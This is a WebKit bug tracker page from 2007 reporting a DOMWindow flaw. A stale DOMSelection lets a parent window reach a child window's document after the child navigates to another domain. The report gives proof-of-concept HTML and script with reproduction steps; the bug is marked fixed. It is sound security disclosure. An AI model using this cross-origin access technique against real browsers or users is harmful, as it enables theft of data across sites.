WebKit Bugzilla
New
Browse
Log In
×
Sign in with GitHub
or
Remember my login
Create Account
·
Forgot Password
Forgotten password account recovery
RESOLVED FIXED
Bug 14610
Security problem in DOMWindow
https://bugs.webkit.org/show_bug.cgi?id=14610
Summary
Security problem in DOMWindow
Feng Qian
Reported
2007-07-13 11:12:42 PDT
The problem was introduced by recent code refactoring in kjs_window and DOMWindow. When navigating to a new page, DOMWindow does nott clear up its DOMSelection object. To show the problem, save following text into a file, say 'selection.html': <html><script> var child; var sel; function openwin() { child = open("hello.html"); } function getsel() { sel = child.getSelection(); } function reloadwin() { child.location="world.html"; } function check() { var selected = sel.anchorNode; var new_doc = selected.ownerDocument; alert(new_doc.baseURI); } </script> <body> <button onclick="openwin()">open</button> <button onclick="getsel()">get selection</button> <button onclick="reloadwin()">reload</button> <button onclick="check()">check</button> </body></html> Also create two files called hello.html, and world.html. <html><body>hello</body></html> <html><body>world</body></html> Put selection.html and hello.html in the same domain, and put world.html in a different domain (you need to change URLs of hello.html and world.html in selection.html). Do following steps: 1. load 'selection.html' in a new window; 2. click the 'open' button, it opens a child window; 3. select "hello" text in the child window; 4. click the 'get selection' in the parent window; 5. click the 'check' button, an alert window pops up and displays the URL of 'hello.html'. So far so good. 6. click the 'reload' button in the parent window, it loads 'world.html' page in the child window. Note that now, the parent window and the child window are in different domains. 7. select 'world' in the child window; 8. click the 'check' button in the first window. an alert window pops up, and displays the URL of 'world.html'. At this point, the parent window has full access to the Document object and DOM nodes under it in the child window even they are from different domains. I will make a patch later.
Attachments
Add attachment
proposed patch, testcase, etc.
Sam Weinig
Comment 1
2007-07-13 11:27:15 PDT
<
rdar://problem/5333782
>
Sam Weinig
Comment 2
2007-07-17 22:44:01 PDT
Fixed in
r24398
.
Note
You need to
log in
before you can comment on or make changes to this bug.
Top of Page
Format For Printing
XML
Clone This Bug